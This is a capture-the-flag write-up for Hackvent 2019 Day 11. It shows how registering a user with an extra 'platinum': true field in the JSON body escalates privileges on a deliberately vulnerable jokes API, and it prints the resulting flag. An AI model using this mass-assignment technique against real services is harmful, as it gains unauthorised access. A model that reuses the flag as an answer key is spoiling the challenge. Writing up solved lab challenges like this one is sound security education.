Hackvent 2019: Day 11

Hackvent 2019220

Challenge

HV19.11 Frolicsome Santa Jokes API

Introduction
The elves created an API where you get random jokes about santa.

Resources
Go and try it here: http://whale.hacking-lab.com:10101

HTML file mirror: HV19-Day11-FSJA-API-Description.html

Solution

We have the spec for the FSJA API that the elves have made. We use Postman to play around with the API to get a feel for how it works.

Following the instructions, we are able to register a new user and authenticate to get a token.
We use the following payload for our user data:

{
  "username": "mobeigi_test_1",
  "password": "ABCDEFG123"
}

Upon logging in with the /fsja/login endpoint we get a token which looks like this:

{
  "message": "Token generated",
  "code": 201,
  "token": "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoibW9iZWlnaV90ZXN0XzEiLCJwbGF0aW51bSI6ZmFsc2V9LCJleHAiOjE1NzYwNTk5MzQuNzgwMDAwMDAwfQ.pbVVcSUmcBEgsV1vYcUs4tVwchH5GP8SaHulTIczpac"
}

The token looks like base64 encoded data. In fact, it happens to be a JWT token.

We finally use the /fsja/random endpoint to get a joke:

{
  "joke": "People really act weird at Christmas time! What other time of year do you sit in front of a dead tree in the living room and eat nuts and sweets out of your socks?",
  "author": "Author Unknown",
  "platinum": false
}

The platinum field stands out to me the most.
As a random hunch, I decide to register a user and provide the platinum field value in the payload myself like so:

{
  "username": "mobeigi_test_2",
  "password": "ABCDEFG123",
  "platinum": true
}

I generate another joke and the API kindly provides us with our flag:

{
  "joke": "Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}",
  "author": "Santa",
  "platinum": true
}

Flag:

HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}

Bonus

This challenge also contained the solution to HV19.H3 Hidden Three


Leave a comment

(required)(will not be published)(required)

Comments

There are no comments yet. Be the first to add one!